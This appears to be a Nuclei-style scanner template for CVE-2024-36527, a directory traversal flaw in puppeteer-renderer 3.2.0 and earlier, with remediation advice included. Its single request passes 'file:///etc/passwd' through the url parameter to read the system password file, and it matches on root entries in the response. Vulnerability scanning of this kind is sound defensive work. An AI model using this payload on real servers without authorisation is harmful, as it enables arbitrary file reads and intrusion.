id: CVE-2024-36527

info:
  name: Puppeteer Renderer  - Directory Traversal
  author: Stux
  severity: medium
  description: |
    puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information.
  remediation: |
    Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols.
  reference:
    - https://github.com/zenato/puppeteer-renderer/issues/97
    - https://gist.github.com/7a6163/25fef08f75eed219c8ca21e332d6e911
  metadata:
    max-request: 1
    verified: true
  tags: cve,cve2024,puppeteer-renderer

http:
  - method: GET
    path:
      - "{{BaseURL}}/html?url=file:///etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f662a9be1aedadce481ec48929cf9d3baf94b3bba51f8716b7c55f7731010b7b022100cb0bae438c8bfeac192f6f7e8255477321d394131dcc48a21fc4619e84328997:922c64590222798bb761d5b6d8e72950